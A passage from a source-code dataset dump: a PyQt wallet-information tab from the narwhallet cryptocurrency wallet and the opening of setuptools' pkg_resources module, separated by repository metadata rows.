# x_shape = tuple(x.shape)
# if x_shape[0] != ndims:
# raise ValueError('Expected batch-size=%d; received shape=%s' %
# (ndims, x_shape))
# return tf.reshape(x, batch_shape + x_shape[1:])
# return flatten_fn, unflatten_fn
| 41.292111 | 95 | 0.682123 |
48cc149dbaf04b7b3ba58856edbfbb9a0dc105c2 | 21,595 | py | Python | narwhallet/core/kui/ux/wallets_tab.py | Snider/narwhallet | 0d528763c735f1e68b8264e302854d41e7cf1956 | [
"MIT"
] | 3 | 2021-12-29T11:25:13.000Z | 2022-01-16T13:57:17.000Z | narwhallet/core/kui/ux/wallets_tab.py | Snider/narwhallet | 0d528763c735f1e68b8264e302854d41e7cf1956 | [
"MIT"
] | null | null | null | narwhallet/core/kui/ux/wallets_tab.py | Snider/narwhallet | 0d528763c735f1e68b8264e302854d41e7cf1956 | [
"MIT"
] | 1 | 2022-01-16T13:57:20.000Z | 2022-01-16T13:57:20.000Z | from PyQt5 import QtCore
from PyQt5.QtGui import QIcon, QPixmap
from PyQt5.QtCore import QObject
from PyQt5.QtWidgets import (QWidget, QVBoxLayout, QFrame, QHBoxLayout,
QLabel, QSpacerItem, QSizePolicy, QPushButton,
QPlainTextEdit, QScrollArea, QSplitter,
QTabWidget)
from narwhallet.control.shared import MShared
from narwhallet.core.kui.ux.widgets import (_transaction_table,
_wallets_addr_tbl,
_wallets_table)
from narwhallet.core.kcl.wallet.wallet import MWallet
class Ui_WalletTab(QObject):
def setupUi(self):
_sp_exp = QSizePolicy.Policy.Expanding
_sp_min = QSizePolicy.Policy.Minimum
_sp_minexp = QSizePolicy.Policy.MinimumExpanding
_transm_st = QtCore.Qt.TransformationMode.SmoothTransformation
self.tabWallets = QWidget()
self.verticalLayout_3 = QVBoxLayout(self.tabWallets)
self.frame_3 = QFrame(self.tabWallets)
self.horizontalLayout_3 = QHBoxLayout(self.frame_3)
self.btn_send = QPushButton(self.frame_3)
self.btn_create = QPushButton(self.frame_3)
self.btn_restore = QPushButton(self.frame_3)
self.btn_watch = QPushButton(self.frame_3)
self.tbl_w = _wallets_table('tbl_w', self.tabWallets)
self.tabWidget_2 = QTabWidget(self.tabWallets)
self.tabTransactions = QWidget()
self.verticalLayout_4 = QVBoxLayout(self.tabTransactions)
self.tbl_tx = _transaction_table('tbl_tx', self.tabTransactions)
self.tabAddresses = QWidget()
self.verticalLayout_5 = QVBoxLayout(self.tabAddresses)
self.frame_4 = QFrame(self.tabAddresses)
self.horizontalLayout_4 = QHBoxLayout(self.frame_4)
self.btn_watch_addr = QPushButton(self.frame_4)
self.btn_addr = QPushButton(self.frame_4)
self.tbl_addr = _wallets_addr_tbl('tbl_addr', self.tabAddresses)
self.tabIntAddresses = QWidget()
self.verticalLayout_7 = QVBoxLayout(self.tabIntAddresses)
self.frame_7 = QFrame(self.tabIntAddresses)
self.horizontalLayout_7 = QHBoxLayout(self.frame_7)
self.btn_addr2 = QPushButton(self.frame_7)
self.tbl_addr2 = _wallets_addr_tbl('tbl_addr',
self.tabIntAddresses)
self._ppic = QPixmap(MShared.get_resource_path('plus.png'))
self._mpic = QPixmap(MShared.get_resource_path('minus.png'))
self._bpic = QPixmap(MShared.get_resource_path('clipboard.png'))
self._bpic = self._bpic.scaledToWidth(20, _transm_st)
self.tabWalletSettings = QWidget()
self.root_vl = QVBoxLayout(self.tabWalletSettings)
self.frame_info = QFrame(self.tabWalletSettings)
self.frame_vl = QVBoxLayout(self.frame_info)
self.hl0 = QHBoxLayout()
self.lwname = QLabel(self.frame_info)
self.wname = QLabel(self.frame_info)
self.hl1 = QHBoxLayout()
self.hl1a = QHBoxLayout()
self.lwmnemonic = QLabel(self.frame_info)
self.llwmnemonic = QPushButton(self.frame_info)
self.cpmnemonic = QPushButton(self.frame_info)
self.wmnemonic = QPlainTextEdit(self.frame_info)
self.hl2 = QHBoxLayout()
self.hl2a = QHBoxLayout()
self.lwseed = QLabel(self.frame_info)
self.llwseed = QPushButton(self.frame_info)
self.cpseed = QPushButton(self.frame_info)
self.wseed = QPlainTextEdit(self.frame_info)
self.hl14 = QHBoxLayout()
self.hl14a = QHBoxLayout()
self.lxprv = QLabel(self.frame_info)
self.llxprv = QPushButton(self.frame_info)
self.cpxprv = QPushButton(self.frame_info)
self.wxprv = QPlainTextEdit(self.frame_info)
self.hl15 = QHBoxLayout()
self.hl15a = QHBoxLayout()
self.lxpub = QLabel(self.frame_info)
self.llxpub = QPushButton(self.frame_info)
self.cpxpub = QPushButton(self.frame_info)
self.wxpub = QPlainTextEdit(self.frame_info)
self.hl3 = QHBoxLayout()
self.lwcoin = QLabel(self.frame_info)
self.wcoin = QLabel(self.frame_info)
# self.hl4 = QHBoxLayout()
# self.lwbip = QLabel(self.frame_info)
# self.wbip = QLabel(self.frame_info)
self.hl5 = QHBoxLayout()
self.lwkind = QLabel(self.frame_info)
self.wkind = QLabel(self.frame_info)
self.hl6 = QHBoxLayout()
self.lwaccount_index = QLabel(self.frame_info)
self.waccount_index = QLabel(self.frame_info)
self.hl7 = QHBoxLayout()
self.lwchange_index = QLabel(self.frame_info)
self.wchange_index = QLabel(self.frame_info)
self.hl8 = QHBoxLayout()
self.lwbalance = QLabel(self.frame_info)
self.wbalance = QLabel(self.frame_info)
self.hl9 = QHBoxLayout()
self.lwlocked = QLabel(self.frame_info)
self.wlocked = QLabel(self.frame_info)
self.hl10 = QHBoxLayout()
self.lwlast_updated = QLabel(self.frame_info)
self.wlast_updated = QLabel(self.frame_info)
self.info_scroll = QScrollArea(self.tabWalletSettings)
splitter_main = QSplitter(QtCore.Qt.Orientation.Vertical)
self.tabWallets.setObjectName('tabWallets')
self.frame_3.setFrameShape(QFrame.Shape.StyledPanel)
self.frame_3.setFrameShadow(QFrame.Shadow.Raised)
self.frame_4.setFrameShape(QFrame.Shape.StyledPanel)
self.frame_4.setFrameShadow(QFrame.Shadow.Raised)
self.btn_watch_addr.setVisible(False)
self.frame_7.setFrameShape(QFrame.Shape.StyledPanel)
self.frame_7.setFrameShadow(QFrame.Shadow.Raised)
self._ppic = self._ppic.scaledToWidth(15, _transm_st)
self._mpic = self._mpic.scaledToWidth(15, _transm_st)
self.frame_info.setFrameShape(QFrame.Shape.StyledPanel)
self.frame_info.setFrameShadow(QFrame.Shadow.Raised)
self.wmnemonic.setMaximumHeight(65)
self.wmnemonic.setVisible(False)
self.wmnemonic.setReadOnly(True)
self.cpmnemonic.setVisible(False)
self.cpmnemonic.setIcon(QIcon(self._bpic))
self.cpmnemonic.setFlat(True)
self.cpmnemonic.setToolTip('Copy Mnemonic to Clipboard')
self.llwmnemonic.setIcon(QIcon(self._ppic))
self.llwmnemonic.setFlat(True)
self.llwmnemonic.setToolTip('Show Mnemonic')
self.wseed.setMaximumHeight(65)
self.wseed.setVisible(False)
self.wseed.setReadOnly(True)
self.cpseed.setVisible(False)
self.cpseed.setIcon(QIcon(self._bpic))
self.cpseed.setFlat(True)
self.cpseed.setToolTip('Copy Seed to Clipboard')
self.llwseed.setIcon(QIcon(self._ppic))
self.llwseed.setFlat(True)
self.llwseed.setToolTip('Show Seed')
self.wxprv.setMaximumHeight(65)
self.wxprv.setVisible(False)
self.wxprv.setReadOnly(True)
self.cpxprv.setVisible(False)
self.cpxprv.setIcon(QIcon(self._bpic))
self.cpxprv.setFlat(True)
self.cpxprv.setToolTip('Copy xprv to Clipboard')
self.llxprv.setIcon(QIcon(self._ppic))
self.llxprv.setFlat(True)
self.llxprv.setToolTip('Show xprv')
self.wxpub.setMaximumHeight(65)
self.wxpub.setVisible(False)
self.wxpub.setReadOnly(True)
self.cpxpub.setVisible(False)
self.cpxpub.setIcon(QIcon(self._bpic))
self.cpxpub.setFlat(True)
self.cpxprv.setToolTip('Copy xpub to Clipboard')
self.llxpub.setIcon(QIcon(self._ppic))
self.llxpub.setFlat(True)
self.llxpub.setToolTip('Show xpub')
self.info_scroll.setWidget(self.frame_info)
self.info_scroll.setWidgetResizable(True)
splitter_main.setStretchFactor(1, 1)
self.horizontalLayout_3.addWidget(self.btn_send)
self.horizontalLayout_3.addItem(QSpacerItem(40, 20, _sp_exp, _sp_min))
self.horizontalLayout_3.addWidget(self.btn_create)
self.horizontalLayout_3.addWidget(self.btn_restore)
self.horizontalLayout_3.addWidget(self.btn_watch)
self.verticalLayout_3.addWidget(self.frame_3)
self.verticalLayout_4.addWidget(self.tbl_tx)
self.tabWidget_2.addTab(self.tabTransactions, '')
self.horizontalLayout_4.addItem(QSpacerItem(40, 20, _sp_exp, _sp_min))
self.horizontalLayout_4.addWidget(self.btn_watch_addr)
self.horizontalLayout_4.addWidget(self.btn_addr)
self.verticalLayout_5.addWidget(self.tbl_addr)
self.verticalLayout_5.addWidget(self.frame_4)
self.tabWidget_2.addTab(self.tabAddresses, '')
self.horizontalLayout_7.addItem(QSpacerItem(40, 20, _sp_exp, _sp_min))
self.horizontalLayout_7.addWidget(self.btn_addr2)
self.verticalLayout_7.addWidget(self.tbl_addr2)
self.verticalLayout_7.addWidget(self.frame_7)
self.tabWidget_2.addTab(self.tabIntAddresses, '')
self.tabWidget_2.addTab(self.tabWalletSettings, '')
self.hl0.addWidget(self.lwname)
self.hl0.addWidget(self.wname)
self.hl0.addItem(QSpacerItem(0, 0, _sp_exp, _sp_min))
self.frame_vl.addLayout(self.hl0)
self.hl1.addWidget(self.lwmnemonic)
self.hl1.addWidget(self.llwmnemonic)
self.hl1.addItem(QSpacerItem(0, 0, _sp_minexp, _sp_min))
self.frame_vl.addLayout(self.hl1)
self.hl1a.addWidget(self.cpmnemonic)
self.hl1a.addWidget(self.wmnemonic)
self.frame_vl.addLayout(self.hl1a)
self.hl2.addWidget(self.lwseed)
self.hl2.addWidget(self.llwseed)
self.hl2.addItem(QSpacerItem(0, 0, _sp_minexp, _sp_min))
self.frame_vl.addLayout(self.hl2)
self.hl2a.addWidget(self.cpseed)
self.hl2a.addWidget(self.wseed)
self.frame_vl.addLayout(self.hl2a)
self.hl14.addWidget(self.lxprv)
self.hl14.addWidget(self.llxprv)
self.hl14.addItem(QSpacerItem(0, 0, _sp_minexp, _sp_min))
self.frame_vl.addLayout(self.hl14)
self.hl14a.addWidget(self.cpxprv)
self.hl14a.addWidget(self.wxprv)
self.frame_vl.addLayout(self.hl14a)
self.hl15.addWidget(self.lxpub)
self.hl15.addWidget(self.llxpub)
self.hl15.addItem(QSpacerItem(0, 0, _sp_minexp, _sp_min))
self.frame_vl.addLayout(self.hl15)
self.hl15a.addWidget(self.cpxpub)
self.hl15a.addWidget(self.wxpub)
self.frame_vl.addLayout(self.hl15a)
self.hl3.addWidget(self.lwcoin)
self.hl3.addWidget(self.wcoin)
self.hl3.addItem(QSpacerItem(40, 20, _sp_exp, _sp_min))
self.frame_vl.addLayout(self.hl3)
# self.hl4.addWidget(self.lwbip)
# self.hl4.addWidget(self.wbip)
# self.hl4.addItem(QSpacerItem(40, 20, _sp_exp, _sp_min))
# self.frame_vl.addLayout(self.hl4)
self.hl5.addWidget(self.lwkind)
self.hl5.addWidget(self.wkind)
self.hl5.addItem(QSpacerItem(40, 20, _sp_exp, _sp_min))
self.frame_vl.addLayout(self.hl5)
self.hl6.addWidget(self.lwaccount_index)
self.hl6.addWidget(self.waccount_index)
self.hl6.addItem(QSpacerItem(40, 20, _sp_exp, _sp_min))
self.frame_vl.addLayout(self.hl6)
self.hl7.addWidget(self.lwchange_index)
self.hl7.addWidget(self.wchange_index)
self.hl7.addItem(QSpacerItem(40, 20, _sp_exp, _sp_min))
self.frame_vl.addLayout(self.hl7)
self.hl8.addWidget(self.lwbalance)
self.hl8.addWidget(self.wbalance)
self.hl8.addItem(QSpacerItem(40, 20, _sp_exp, _sp_min))
self.frame_vl.addLayout(self.hl8)
self.hl9.addWidget(self.lwlocked)
self.hl9.addWidget(self.wlocked)
self.hl9.addItem(QSpacerItem(40, 20, _sp_exp, _sp_min))
self.frame_vl.addLayout(self.hl9)
self.hl10.addWidget(self.lwlast_updated)
self.hl10.addWidget(self.wlast_updated)
self.hl10.addItem(QSpacerItem(40, 20, _sp_exp, _sp_min))
self.frame_vl.addLayout(self.hl10)
self.frame_vl.addItem(QSpacerItem(5, 5, _sp_min, _sp_exp))
self.root_vl.addWidget(self.info_scroll)
splitter_main.addWidget(self.tbl_w)
splitter_main.addWidget(self.tabWidget_2)
splitter_main.setSizes([250, 350])
self.verticalLayout_3.addWidget(splitter_main)
self.tabWidget_2.setCurrentIndex(0)
self.llwmnemonic.clicked.connect(self._display_mnemonic)
self.llwseed.clicked.connect(self._display_seed)
self.llxprv.clicked.connect(self._display_xprv)
self.llxpub.clicked.connect(self._display_xpub)
def retranslateUi(self):
_translate = QtCore.QCoreApplication.translate
self.btn_send.setText(_translate('tabWallets', 'Send'))
self.btn_create.setText(_translate('tabWallets',
'Create'))
self.btn_restore.setText(_translate('tabWallets',
'Restore'))
self.btn_watch.setText(_translate('tabWallets', 'W/O'))
self.tabWidget_2.setTabText(self.tabWidget_2
.indexOf(self.tabTransactions),
_translate('tabWallets', 'Transactions'))
self.btn_watch_addr.setText(_translate('tabWallets',
'Add Address'))
self.btn_addr.setText(_translate('tabWallets',
'Increase Pool'))
self.btn_addr2.setText(_translate('tabWallets',
'Increase Pool'))
self.tabWidget_2.setTabText(self.tabWidget_2
.indexOf(self.tabIntAddresses),
_translate('tabWallets', 'Change'))
self.tabWidget_2.setTabText(self.tabWidget_2
.indexOf(self.tabAddresses),
_translate('tabWallets', 'Addresses'))
self.tabWidget_2.setTabText(self.tabWidget_2
.indexOf(self.tabWalletSettings),
_translate('tabWallets', 'Info'))
self.lwname.setText(_translate('tabWallets', 'Name:'))
self.lwmnemonic.setText(_translate('tabWallets', 'Mnemonic:'))
self.lwseed.setText(_translate('tabWallets', 'Seed:'))
self.lxprv.setText(_translate('tabWallets', 'xprv:'))
self.lxpub.setText(_translate('tabWallets', 'xpub:'))
self.lwcoin.setText(_translate('tabWallets', 'Coin:'))
self.lwkind.setText(_translate('tabWallets', 'Kind:'))
# self.lwbip.setText(_translate('tabWallets', 'BIP:'))
self.lwaccount_index.setText(_translate('tabWallets',
'Account Index:'))
self.lwchange_index.setText(_translate('tabWallets', 'Change Index:'))
self.lwbalance.setText(_translate('tabWallets', 'Balance:'))
self.lwlocked.setText(_translate('tabWallets', 'Locked:'))
self.lwlast_updated.setText(_translate('tabWallets', 'Last Updated:'))
def _display_mnemonic(self, _event):
if self.wmnemonic.isVisible() is True:
self.wmnemonic.setVisible(False)
self.cpmnemonic.setVisible(False)
self.llwmnemonic.setIcon(QIcon(self._ppic))
self.llwmnemonic.setToolTip('Show Mnemonic')
else:
self.wmnemonic.setVisible(True)
self.cpmnemonic.setVisible(True)
self.llwmnemonic.setIcon(QIcon(self._mpic))
self.llwmnemonic.setToolTip('Hide Mnemonic')
def _display_seed(self, _event):
if self.wseed.isVisible() is True:
self.wseed.setVisible(False)
self.cpseed.setVisible(False)
self.llwseed.setIcon(QIcon(self._ppic))
self.llwseed.setToolTip('Show Seed')
else:
self.wseed.setVisible(True)
self.cpseed.setVisible(True)
self.llwseed.setIcon(QIcon(self._mpic))
self.llwseed.setToolTip('Hide Seed')
def _display_xprv(self, _event):
if self.wxprv.isVisible() is True:
self.wxprv.setVisible(False)
self.cpxprv.setVisible(False)
self.llxprv.setIcon(QIcon(self._ppic))
self.llxprv.setToolTip('Show xprv')
else:
self.wxprv.setVisible(True)
self.cpxprv.setVisible(True)
self.llxprv.setIcon(QIcon(self._mpic))
self.llxprv.setToolTip('Hide xrpv')
def _display_xpub(self, _event):
if self.wxpub.isVisible() is True:
self.wxpub.setVisible(False)
self.cpxpub.setVisible(False)
self.llxpub.setIcon(QIcon(self._ppic))
(self.llxpub
.setToolTip(self.llxpub.toolTip().replace('Hide', 'Show')))
else:
self.wxpub.setVisible(True)
self.cpxpub.setVisible(True)
self.llxpub.setIcon(QIcon(self._mpic))
(self.llxpub
.setToolTip(self.llxpub.toolTip().replace('Show', 'Hide')))
def set_info_values(self, wallet: MWallet):
self.wname.setText(wallet.name)
if wallet.mnemonic is None:
self.lwmnemonic.setVisible(False)
self.llwmnemonic.setVisible(False)
self.wmnemonic.setVisible(False)
self.cpmnemonic.setVisible(False)
self.wmnemonic.setPlainText('')
else:
self.lwmnemonic.setVisible(True)
self.llwmnemonic.setVisible(True)
self.wmnemonic.setVisible(False)
self.cpmnemonic.setVisible(False)
self.llwmnemonic.setIcon(QIcon(self._ppic))
self.wmnemonic.setPlainText(wallet.mnemonic)
if wallet.seed is None:
self.llwseed.setVisible(False)
self.lwseed.setVisible(False)
self.wseed.setVisible(False)
self.cpseed.setVisible(False)
self.wseed.setPlainText('')
else:
self.llwseed.setVisible(True)
self.lwseed.setVisible(True)
self.wseed.setVisible(False)
self.cpseed.setVisible(False)
self.llwseed.setIcon(QIcon(self._ppic))
self.wseed.setPlainText(wallet.seed)
wallet.generate_extended_prv()
if wallet.extended_prv is None:
self.llxprv.setVisible(False)
self.lxprv.setVisible(False)
self.wxprv.setVisible(False)
self.cpxprv.setVisible(False)
self.wxprv.setPlainText('')
else:
self.llxprv.setVisible(True)
self.lxprv.setVisible(True)
self.wxprv.setVisible(False)
self.cpxprv.setVisible(False)
self.llxprv.setIcon(QIcon(self._ppic))
self.wxprv.setPlainText(wallet.extended_prv)
wallet.generate_extended_pub()
self.wxpub.setPlainText(wallet.extended_pub)
if wallet.bip == 'bip49':
self.lxpub.setText('ypub')
self.cpxpub.setToolTip('Copy ypub to Clipboard')
self.llxpub.setToolTip('Show ypub')
self.wcoin.setText(wallet.coin)
self.wkind.setText(wallet.kind.name)
if wallet.kind == 3:
self.btn_watch_addr.setVisible(True)
self.btn_addr.setVisible(False)
self.btn_addr2.setVisible(False)
self.llxpub.setVisible(False)
self.lxpub.setVisible(False)
self.cpxpub.setVisible(False)
self.wxpub.setVisible(False)
else:
self.llxpub.setIcon(QIcon(self._ppic))
self.btn_watch_addr.setVisible(False)
self.btn_addr.setVisible(True)
self.btn_addr2.setVisible(True)
self.llxpub.setVisible(True)
self.lxpub.setVisible(True)
self.cpxpub.setVisible(False)
self.wxpub.setVisible(False)
# self.wbip.setText(wallet.bip)
self.waccount_index.setText(str(wallet.account_index))
self.wchange_index.setText(str(wallet.change_index))
self.wbalance.setText(str(wallet.balance))
if wallet.locked is not None:
self.wlocked.setText(str(wallet.locked))
else:
self.wlocked.setText('False')
if wallet.last_updated is not None:
(self.wlast_updated.setText(
MShared.get_timestamp(wallet.last_updated)[1]))
def reset_info_values(self):
self.wname.setText('')
self.lwmnemonic.setVisible(False)
self.llwmnemonic.setVisible(False)
self.wmnemonic.setVisible(False)
self.cpmnemonic.setVisible(False)
self.wmnemonic.setPlainText('')
self.llwseed.setVisible(False)
self.lwseed.setVisible(False)
self.wseed.setVisible(False)
self.cpseed.setVisible(False)
self.wseed.setPlainText('')
self.llxprv.setVisible(False)
self.lxprv.setVisible(False)
self.wxprv.setVisible(False)
self.cpxprv.setVisible(False)
self.wxpub.setPlainText('')
self.wxprv.setPlainText('')
self.lxpub.setText('ypub')
self.wcoin.setText('')
self.wkind.setText('')
self.btn_watch_addr.setVisible(False)
self.btn_addr.setVisible(False)
self.btn_addr2.setVisible(False)
# self.wbip.setText('')
self.waccount_index.setText('')
self.wchange_index.setText('')
self.wbalance.setText('')
self.wlocked.setText('False')
self.wlast_updated.setText('')
| 45.463158 | 78 | 0.643297 |
aca743a3a610afcbde2f07bdecfdf453f4488a34 | 88,823 | py | Python | shell/pkg_resources.py | suifengzhuliu/impala | 611f4c6f3b18cfcddff3b2956cbb87c295a87655 | [
"Apache-2.0"
] | 1,523 | 2015-01-01T03:42:24.000Z | 2022-02-06T22:24:04.000Z | shell/pkg_resources.py | suifengzhuliu/impala | 611f4c6f3b18cfcddff3b2956cbb87c295a87655 | [
"Apache-2.0"
] | 10 | 2015-01-09T06:46:05.000Z | 2022-03-29T21:57:57.000Z | shell/pkg_resources.py | suifengzhuliu/impala | 611f4c6f3b18cfcddff3b2956cbb87c295a87655 | [
"Apache-2.0"
] | 647 | 2015-01-02T04:01:40.000Z | 2022-03-30T15:57:35.000Z | """
This file is redistributed under the Python Software Foundation License:
http://docs.python.org/2/license.html
"""
"""Package resource API
--------------------
A resource is a logical file contained within a package, or a logical
subdirectory thereof. The package resource API expects resource names
to have their path parts separated with ``/``, *not* whatever the local
path separator is. Do not use os.path operations to manipulate resource
names being passed into the API.
The package resource API is designed to work with normal filesystem packages,
.egg files, and unpacked .egg files. It can also work in a limited way with
.zip files and with custom PEP 302 loaders that support the ``get_data()``
method.
"""
import sys, os, zipimport, time, re, imp, types
from urlparse import urlparse, urlunparse
try:
frozenset
except NameError:
from sets import ImmutableSet as frozenset
# capture these to bypass sandboxing
from os import utime
try:
from os import mkdir, rename, unlink
WRITE_SUPPORT = True
except ImportError:
# no write support, probably under GAE
WRITE_SUPPORT = False
from os import open as os_open
from os.path import isdir, split
# This marker is used to simplify the process that checks is the
# setuptools package was installed by the Setuptools project
# or by the Distribute project, in case Setuptools creates
# a distribution with the same version.
#
# The bootstrapping script for instance, will check if this
# attribute is present to decide wether to reinstall the package
_distribute = True
def _bypass_ensure_directory(name, mode=0777):
# Sandbox-bypassing version of ensure_directory()
if not WRITE_SUPPORT:
raise IOError('"os.mkdir" not supported on this platform.')
dirname, filename = split(name)
if dirname and filename and not isdir(dirname):
_bypass_ensure_directory(dirname)
mkdir(dirname, mode)
def get_supported_platform():
"""Return this platform's maximum compatible version.
distutils.util.get_platform() normally reports the minimum version
of Mac OS X that would be required to *use* extensions produced by
distutils. But what we want when checking compatibility is to know the
version of Mac OS X that we are *running*. To allow usage of packages that
explicitly require a newer version of Mac OS X, we must also know the
current version of the OS.
If this condition occurs for any other platform with a version in its
platform strings, this function should be extended accordingly.
"""
plat = get_build_platform(); m = macosVersionString.match(plat)
if m is not None and sys.platform == "darwin":
try:
plat = 'macosx-%s-%s' % ('.'.join(_macosx_vers()[:2]), m.group(3))
except ValueError:
pass # not Mac OS X
return plat
__all__ = [
# Basic resource access and distribution/entry point discovery
'require', 'run_script', 'get_provider', 'get_distribution',
'load_entry_point', 'get_entry_map', 'get_entry_info', 'iter_entry_points',
'resource_string', 'resource_stream', 'resource_filename',
'resource_listdir', 'resource_exists', 'resource_isdir',
# Environmental control
'declare_namespace', 'working_set', 'add_activation_listener',
'find_distributions', 'set_extraction_path', 'cleanup_resources',
'get_default_cache',
# Primary implementation classes
'Environment', 'WorkingSet', 'ResourceManager',
'Distribution', 'Requirement', 'EntryPoint',
# Exceptions
'ResolutionError','VersionConflict','DistributionNotFound','UnknownExtra',
'ExtractionError',
# Parsing functions and string utilities
'parse_requirements', 'parse_version', 'safe_name', 'safe_version',
'get_platform', 'compatible_platforms', 'yield_lines', 'split_sections',
'safe_extra', 'to_filename',
# filesystem utilities
'ensure_directory', 'normalize_path',
# Distribution "precedence" constants
'EGG_DIST', 'BINARY_DIST', 'SOURCE_DIST', 'CHECKOUT_DIST', 'DEVELOP_DIST',
# "Provider" interfaces, implementations, and registration/lookup APIs
'IMetadataProvider', 'IResourceProvider', 'FileMetadata',
'PathMetadata', 'EggMetadata', 'EmptyProvider', 'empty_provider',
'NullProvider', 'EggProvider', 'DefaultProvider', 'ZipProvider',
'register_finder', 'register_namespace_handler', 'register_loader_type',
'fixup_namespace_packages', 'get_importer',
# Deprecated/backward compatibility only
'run_main', 'AvailableDistributions',
]
class ResolutionError(Exception):
"""Abstract base for dependency resolution errors"""
def __repr__(self):
return self.__class__.__name__+repr(self.args)
class VersionConflict(ResolutionError):
"""An already-installed version conflicts with the requested version"""
class DistributionNotFound(ResolutionError):
"""A requested distribution was not found"""
class UnknownExtra(ResolutionError):
"""Distribution doesn't have an "extra feature" of the given name"""
_provider_factories = {}
PY_MAJOR = sys.version[:3]
EGG_DIST = 3
BINARY_DIST = 2
SOURCE_DIST = 1
CHECKOUT_DIST = 0
DEVELOP_DIST = -1
def register_loader_type(loader_type, provider_factory):
"""Register `provider_factory` to make providers for `loader_type`
`loader_type` is the type or class of a PEP 302 ``module.__loader__``,
and `provider_factory` is a function that, passed a *module* object,
returns an ``IResourceProvider`` for that module.
"""
_provider_factories[loader_type] = provider_factory
def get_provider(moduleOrReq):
"""Return an IResourceProvider for the named module or requirement"""
if isinstance(moduleOrReq,Requirement):
return working_set.find(moduleOrReq) or require(str(moduleOrReq))[0]
try:
module = sys.modules[moduleOrReq]
except KeyError:
__import__(moduleOrReq)
module = sys.modules[moduleOrReq]
loader = getattr(module, '__loader__', None)
return _find_adapter(_provider_factories, loader)(module)
def _macosx_vers(_cache=[]):
if not _cache:
import platform
version = platform.mac_ver()[0]
# fallback for MacPorts
if version == '':
import plistlib
plist = '/System/Library/CoreServices/SystemVersion.plist'
if os.path.exists(plist):
if hasattr(plistlib, 'readPlist'):
plist_content = plistlib.readPlist(plist)
if 'ProductVersion' in plist_content:
version = plist_content['ProductVersion']
_cache.append(version.split('.'))
return _cache[0]
def _macosx_arch(machine):
return {'PowerPC':'ppc', 'Power_Macintosh':'ppc'}.get(machine,machine)
def get_build_platform():
"""Return this platform's string for platform-specific distributions
XXX Currently this is the same as ``distutils.util.get_platform()``, but it
needs some hacks for Linux and Mac OS X.
"""
try:
from distutils.util import get_platform
except ImportError:
from sysconfig import get_platform
plat = get_platform()
if sys.platform == "darwin" and not plat.startswith('macosx-'):
try:
version = _macosx_vers()
machine = os.uname()[4].replace(" ", "_")
return "macosx-%d.%d-%s" % (int(version[0]), int(version[1]),
_macosx_arch(machine))
except ValueError:
# if someone is running a non-Mac darwin system, this will fall
# through to the default implementation
pass
return plat
macosVersionString = re.compile(r"macosx-(\d+)\.(\d+)-(.*)")
darwinVersionString = re.compile(r"darwin-(\d+)\.(\d+)\.(\d+)-(.*)")
get_platform = get_build_platform # XXX backward compat
def compatible_platforms(provided,required):
"""Can code for the `provided` platform run on the `required` platform?
Returns true if either platform is ``None``, or the platforms are equal.
XXX Needs compatibility checks for Linux and other unixy OSes.
"""
if provided is None or required is None or provided==required:
return True # easy case
# Mac OS X special cases
reqMac = macosVersionString.match(required)
if reqMac:
provMac = macosVersionString.match(provided)
# is this a Mac package?
if not provMac:
# this is backwards compatibility for packages built before
# setuptools 0.6. All packages built after this point will
# use the new macosx designation.
provDarwin = darwinVersionString.match(provided)
if provDarwin:
dversion = int(provDarwin.group(1))
macosversion = "%s.%s" % (reqMac.group(1), reqMac.group(2))
if dversion == 7 and macosversion >= "10.3" or \
dversion == 8 and macosversion >= "10.4":
#import warnings
#warnings.warn("Mac eggs should be rebuilt to "
# "use the macosx designation instead of darwin.",
# category=DeprecationWarning)
return True
return False # egg isn't macosx or legacy darwin
# are they the same major version and machine type?
if provMac.group(1) != reqMac.group(1) or \
provMac.group(3) != reqMac.group(3):
return False
# is the required OS major update >= the provided one?
if int(provMac.group(2)) > int(reqMac.group(2)):
return False
return True
# XXX Linux and other platforms' special cases should go here
return False
def run_script(dist_spec, script_name):
"""Locate distribution `dist_spec` and run its `script_name` script"""
ns = sys._getframe(1).f_globals
name = ns['__name__']
ns.clear()
ns['__name__'] = name
require(dist_spec)[0].run_script(script_name, ns)
run_main = run_script # backward compatibility
def get_distribution(dist):
"""Return a current distribution object for a Requirement or string"""
if isinstance(dist,basestring): dist = Requirement.parse(dist)
if isinstance(dist,Requirement): dist = get_provider(dist)
if not isinstance(dist,Distribution):
raise TypeError("Expected string, Requirement, or Distribution", dist)
return dist
def load_entry_point(dist, group, name):
"""Return `name` entry point of `group` for `dist` or raise ImportError"""
return get_distribution(dist).load_entry_point(group, name)
def get_entry_map(dist, group=None):
"""Return the entry point map for `group`, or the full entry map"""
return get_distribution(dist).get_entry_map(group)
def get_entry_info(dist, group, name):
"""Return the EntryPoint object for `group`+`name`, or ``None``"""
return get_distribution(dist).get_entry_info(group, name)
class IMetadataProvider:
def has_metadata(name):
"""Does the package's distribution contain the named metadata?"""
def get_metadata(name):
"""The named metadata resource as a string"""
def get_metadata_lines(name):
"""Yield named metadata resource as list of non-blank non-comment lines
Leading and trailing whitespace is stripped from each line, and lines
with ``#`` as the first non-blank character are omitted."""
def metadata_isdir(name):
"""Is the named metadata a directory? (like ``os.path.isdir()``)"""
def metadata_listdir(name):
"""List of metadata names in the directory (like ``os.listdir()``)"""
def run_script(script_name, namespace):
"""Execute the named script in the supplied namespace dictionary"""
class IResourceProvider(IMetadataProvider):
"""An object that provides access to package resources"""
def get_resource_filename(manager, resource_name):
"""Return a true filesystem path for `resource_name`
`manager` must be an ``IResourceManager``"""
def get_resource_stream(manager, resource_name):
"""Return a readable file-like object for `resource_name`
`manager` must be an ``IResourceManager``"""
def get_resource_string(manager, resource_name):
"""Return a string containing the contents of `resource_name`
`manager` must be an ``IResourceManager``"""
def has_resource(resource_name):
"""Does the package contain the named resource?"""
def resource_isdir(resource_name):
"""Is the named resource a directory? (like ``os.path.isdir()``)"""
def resource_listdir(resource_name):
"""List of resource names in the directory (like ``os.listdir()``)"""
class WorkingSet(object):
"""A collection of active distributions on sys.path (or a similar list)"""
def __init__(self, entries=None):
"""Create working set from list of path entries (default=sys.path)"""
self.entries = []
self.entry_keys = {}
self.by_key = {}
self.callbacks = []
if entries is None:
entries = sys.path
for entry in entries:
self.add_entry(entry)
def add_entry(self, entry):
"""Add a path item to ``.entries``, finding any distributions on it
``find_distributions(entry,True)`` is used to find distributions
corresponding to the path entry, and they are added. `entry` is
always appended to ``.entries``, even if it is already present.
(This is because ``sys.path`` can contain the same value more than
once, and the ``.entries`` of the ``sys.path`` WorkingSet should always
equal ``sys.path``.)
"""
self.entry_keys.setdefault(entry, [])
self.entries.append(entry)
for dist in find_distributions(entry, True):
self.add(dist, entry, False)
def __contains__(self,dist):
